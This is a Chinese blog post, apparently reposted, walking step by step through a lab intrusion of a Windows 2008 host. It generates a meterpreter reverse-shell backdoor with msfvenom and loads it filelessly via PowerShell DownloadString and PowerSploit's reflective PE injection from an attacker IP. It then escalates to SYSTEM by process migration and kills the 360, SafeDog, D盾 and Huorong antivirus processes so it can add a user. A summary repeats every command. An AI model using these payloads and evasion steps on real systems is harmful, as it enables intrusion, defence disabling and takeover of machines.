记一次PowerShell配合Metersploit的艰难提权
2022/1/25 7:06:26
本文主要是介绍记一次PowerShell配合Metersploit的艰难提权,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
0x01 环境准备
kali(模拟公网攻击机)
Windows2008(靶机,装有360、火绒、安全狗、D盾)
Powersploit(PowerShell攻击框架)
https://github.com/PowerShellMafia/PowerSploit
0x02 尝试落地payload
首先msfvenom生成exe后门程序
msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe lhost=192.168.192.119 lport=6666 -o ./6666.exe
Python3开启http下载服务
python3 -m http.server
msf开启监听
执行powershell命令时被火绒拦截
(New-Object Net.WebClient).DownloadString("http://192.168.192.119:8000/6666.exe")
0x03 PowerShell内存执行exe
这也是现在红军非常流行的攻击手法,payload在内存中加载执行,也就是所谓的文件不落地,大致分以下几步
- 先将生成的payload在本地进行base64编码
- 靶机执行远程下载命令
- 靶机对payload进行解码并赋值给一个变量
- PowerShell远程加载Invoke-ReflectivePEInjection模块(PE反射注入)并执行payload
本地编码payload
PowerShell下执行
function Convert-BinaryToString { [CmdletBinding()] param ( [string] $FilePath ) try { $ByteArray = [System.IO.File]::ReadAllBytes($FilePath); } catch { throw "Failed to read file. Ensure that you have permission to the file, and that the file path is correct."; } if ($ByteArray) { $Base64String = [System.Convert]::ToBase64String($ByteArray); } else { throw '$ByteArray is $null.'; } Write-Output -InputObject $Base64String; } Convert-BinaryToString C:\6666.exe > C:\res.txt
将res.txt放置到kali中的下载服务目录,供靶机加载
接下来远程加载Powersploit的PE反射模块
iex(New-Object Net.WebClient).DownloadString("http://192.168.192.119:8000/Invoke-ReflectivePEInjection.ps1")
继续加载base64编码后的payload,赋值给一个变量
$b64Str = (New-Object Net.WebClient).DownloadString("http://192.168.192.119:8000/res.txt")
靶机解码payload
$PEBytes = [System.Convert]::FromBase64String($InputString)
反射调用
Invoke-ReflectivePEInjection -PEBytes $PEBytes -ForceASLR
msf成功上线,全程没有任何文件落地,比较成功地避开了杀软对磁盘的查杀
0x04 艰难的后渗透攻击
先看一下进程,Windows下,我个人比较中意svchost.exe这个进程,注入率比较高,而且又是system权限,先来试试吧
ps -ef | grep svchost.exe
成功提权
migrate 336
当我准备添加用户的时候,被360的ZhuDongFangYu.exe进程拦截,接下来就是想办法干掉360、火绒、D盾、安全狗的主动防御系统
0x05 Kill主动防御
因为现在是system权限,所以优先尝试kill、pkill这两条命令。经过fuzz,得出以下几点结论
- D盾可直接Kill掉
- 360、安全狗Kill掉后,30秒后会再次重启
- 火绒权限不够,无法直接Kill
meterpreter > pkill ZhuDongFangYu.exe Filtering on 'ZhuDongFangYu.exe' Killing: 6056 meterpreter > pkill SafeDogGuardCenter.exe Filtering on 'SafeDogGuardCenter.exe' Killing: 5752 meterpreter > pkill HipsTray.exe Filtering on 'HipsTray.exe' Killing: 7416 [-] stdapi_sys_process_kill: Operation failed: Access is denied. meterpreter >
0x06 绕过杀软
因为360的权限是比较高的,且我现在是system权限,就像尝试注入一下360的主动防御进程,竟然成功了!
这一下我直接好家伙,先把SafeDog干掉
ps -ef | Safe pkill Safe
来靶机上看一下,发现安全狗的主进程都被干掉了,360还是狠啊
当我尝试杀死火绒的进程时,被火绒反杀了,也就是说,火绒把360的主动防御干掉了,可想而知它的权限得多大
重连一次shell后,我尝试注入360主动防御,杀死所有360的程序,成功拿下!
这时候还有一个ZhuDongFangYu.exe没杀,所以我们再注入回svchost.exe用它去杀死360的主动防御,这次杀死后就不会再生了,因为主程序已经被它干死了哈哈哈
现在就剩下火绒了,我进入shell,尝试用taskkill干掉他的时候,发现了一个有意思的提示
火绒的父进程是service.exe,那么如果我注入到service.exe中,用service.exe杀Hips*.exe不过分吧?老子打儿子总没毛病了吧?
结果让我很满意哈哈哈哈哈
成功添加用户,遗憾的是没有添加到管理员组,这次艰难的后渗透,就先到这儿吧
0x07 总结
1.攻击机上msfvenom生成exe后门程序msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe lhost=192.168.192.119 lport=6666 -o ./6666.exe2.将生成的payload在本地进行base64编码function Convert-BinaryToString { [CmdletBinding()] param ( [string] $FilePath ) try { $ByteArray = [System.IO.File]::ReadAllBytes($FilePath); } catch { throw "Failed to read file. Ensure that you have permission to the file, and that the file path is correct."; } if ($ByteArray) { $Base64String = [System.Convert]::ToBase64String($ByteArray); } else { throw '$ByteArray is $null.'; } Write-Output -InputObject $Base64String; }Convert-BinaryToString C:\6666.exe > C:\res.txt2.将res.txt放置到攻击机中的下载服务目录,Python3开启http下载服务python3 -m http.server3.假设这里通过冰蝎已成功连接目录靶机的shell,在冰蝎的命令功能中中执行远程加载Powersploit的PE反射模块powershell iex(New-Object Net.WebClient).DownloadString("http://192.168.192.119:8000/Invoke-ReflectivePEInjection.ps1")4.继续加载base64编码后的payload,赋值给一个变量powershell $b64Str = (New-Object Net.WebClient).DownloadString("http://192.168.192.119:8000/res.txt")5.靶机解码payloadpowershell $PEBytes = [System.Convert]::FromBase64String($InputString)6.反射调用powershell Invoke-ReflectivePEInjection -PEBytes $PEBytes -ForceASLR7.MSF进行监听,msf成功上线msf>use exploit/multi/handlermsf>set lport 6666msf>set payload windows/x64/meterprteter/reverse_tcpmsf>set lhost 192.168.192.119msf>run8.进行信息收集查看meterprter>sysinfo //查看下系统版本meterprter>ps -ef | grep svchost.exe //查看svchost.exe对应的进程和权限,发现有一个system权限的进程ID号为336meterprter>migrate 336 //进程迁移到svchost.exe的system权限meterprter>shellc:\>whomai //查看目标系统权限为system权限,可成功提权9.但是添加用户的时候被安全卫士的ZhuDongFangYu.exe进程拦截10通过kill和pkill命令来进行关闭360,安全狗和火绒的进程meterpreter > pkill ZhuDongFangYu.exe //通过pkill可成功关闭360安全卫士,但是30秒会重启Filtering on 'ZhuDongFangYu.exe' Killing: 6056 meterpreter > pkill SafeDogGuardCenter.exe //通过pkill可成功关闭安全狗,但是30秒会重启Filtering on 'SafeDogGuardCenter.exe' Killing: 5752 meterpreter > pkill HipsTray.exe //通过pkill不能关闭火绒,权限不够Filtering on 'HipsTray.exe' Killing: 7416 [-] stdapi_sys_process_kill: Operation failed: Access is denied. meterprter>ps -ef | grep ZhuDongFangYu.exe //查看ZhuDongFangYu.exe对应的system 权限的进程ID为6180meterprter>migrate 6180 //进程迁移到ZhuDongFangYu.exe对应的system 权限的进程meterprter>getuid //发现当前权限已成功提权为systemmeterprter>ps -ef | Safe //查看安全狗对应的进程meterprter> pkill Safe //关闭安全狗,但是不能关闭火绒meterprter>shellc:/>tasklist |findstr Hips //查看火绒服务对应的进程,发现HipsMain.exe主程序为800c:/>taskkill /PID 800 /F //尝试kill掉主程序,发现失败c:/>taskkill /f /t /im Hips* //尝试kill掉所有火绒服务,但是失败,发现子进程错误 c:/> taskkill |findstr 552 //参数查看所有子进程对应的服务,其中只能查看进程552对应的服务为services.exemeterpreter >migrate 552 //注入到services.exe进程中c:/>taskkill /f /t /im Hips* //kill所有的火绒服务,可成功禁用掉原文连接:https://cloud.tencent.com/developer/article/1865215
这篇关于记一次PowerShell配合Metersploit的艰难提权的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2022-09-14SharePoint 2019 用 PowerShell将启用发布功能站点网站集另存为模板
- 2022-08-30PowerShell教程 - 程序性能和BUG分析工具
- 2022-08-30PowerShell教程 - 模块管理(Modules Management)
- 2022-08-29PowerShell教程 - Web requests(Web请求)
- 2022-08-26PowerShell教程 - 日期时间管理(Date & Time Management)
- 2022-08-25PowerShell教程 - 磁盘与硬件管理(Disk & Hardware Management)
- 2022-08-25PowerShell教程 - 系统事件管理(System Event Management)
- 2022-08-25PowerShell教程 - 文件系统管理(File System Management)
- 2022-08-24PowerShell教程 - 网络管理(Network Management)
- 2022-08-24PowerShell